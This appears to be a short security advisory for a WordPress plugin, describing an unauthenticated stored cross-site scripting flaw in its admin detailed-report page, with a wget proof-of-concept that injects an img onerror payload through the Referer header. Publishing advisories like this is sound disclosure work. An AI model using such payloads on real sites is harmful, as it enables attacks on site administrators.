The plugin does not sanitise and escape some input before outputting it in an admin dashboard page, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admins viewing it
As unauthenticated: wget "https://example.com/?p=1" --header "Referer: <img src onerror=alert(/XSS/)>" -O- The XSS will be triggered when an admin access the detailed report of the related article: e.g https://example.com/wp-admin/admin.php?page=apvc-dashboard-page&apvc_page=detailed-reports&article_id=1
Krzysztof Zając
Krzysztof Zając
Yes
2022-04-05 (about 11 months ago)
2022-04-05 (about 11 months ago)
2022-06-13 (about 9 months ago)